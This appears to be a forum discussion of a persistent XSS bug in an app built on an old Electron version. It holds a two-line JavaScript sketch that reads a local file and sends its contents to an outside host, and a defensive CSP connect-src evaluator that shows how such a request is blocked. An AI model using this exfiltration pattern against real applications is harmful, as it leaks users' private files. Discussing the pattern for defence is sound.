He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
> There are more than 5 different 1-day RCEs in Chromium 69 or higher, you just need to find a published one and use it through the persistent XSS found earlier and BAM: Remote Code Execution ACHIEVED!
> I did not take the time to actually exploit a public RCE
The XSS vulnerability is serious and looks fully deserving of a bug bounty. Likewise, using an old version of Electron is asking for trouble. But for me this PoC should include the extra step of "just" exploiting one of the RCE holes he's sure must exist.
> He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
If you can fetch arbitrary URLs, and the contents of local files, you can trivially exfiltrate the latter with the former. Just fetch the local file, then fetch a URL that encodes the contents of the local file.
const text = await (await fetch("/local/secret/file")).text(); // fetch() returns a Promise; read the body as text
await fetch("https://example.org/?d=" + encodeURIComponent(text)); // URL-encode the contents before putting them in the query string
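The second fetch in that sketch is exactly what a Content-Security-Policy connect-src directive governs, so as an added example (mine, not from this thread or the app under discussion) here is a small evaluator that shows a policy with no connect-src letting the exfiltration request through and a restrictive one blocking it. CSP only narrows the outbound channel; it does nothing about the XSS or the local read itself. The page origin, API host and attacker host are constructed, and matching ignores ports, paths, nonces and hashes.

```javascript
// Added example (not from the thread): a small evaluator for the CSP
// connect-src directive, which governs where fetch()/XHR may connect.
// Matching is simplified: no ports, paths, nonces or hashes. All origins
// below are constructed for illustration.

function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Matches one source expression ('self', *, https:, host, *.host) against a target URL.
function matchSource(src, target, page) {
  if (src === "'self'") return target.origin === page.origin;
  if (src === "*") return true;
  const m = /^(?:([a-z][a-z0-9+.-]*):(?:\/\/)?)?(\*\.)?([^:/*']*)$/i.exec(src);
  if (!m) return false; // keywords such as 'none' or 'unsafe-inline' never match a host
  const [, scheme, wildcard, host] = m;
  const protocol = scheme ? scheme.toLowerCase() + ":" : page.protocol;
  if (target.protocol !== protocol) return false;
  if (!host) return Boolean(scheme); // bare scheme-source such as "https:"
  const h = host.toLowerCase();
  return wildcard ? target.hostname.endsWith("." + h) : target.hostname === h;
}

// True if a page at `pageUrl` under `policy` may fetch() `url`.
// connect-src falls back to default-src; with neither present, anything goes.
function connectAllowed(policy, pageUrl, url) {
  const d = parseCsp(policy);
  const sources = d["connect-src"] || d["default-src"];
  if (sources === undefined) return true;
  if (sources.includes("'none'")) return false;
  const page = new URL(pageUrl);
  const target = new URL(url, pageUrl);
  return sources.some((src) => matchSource(src, target, page));
}

// Constructed policies: the weak one never mentions connect-src, so the
// exfiltration fetch to an attacker host is allowed; the hardened one
// allows only the app's own origin and its API host.
const WEAK = "script-src 'self'";
const HARDENED = "default-src 'none'; script-src 'self'; connect-src 'self' https://api.example.net";
const PAGE = "https://app.example.com/index.html";
```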
> He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
Are you saying he could alert it but not exfiltrate it?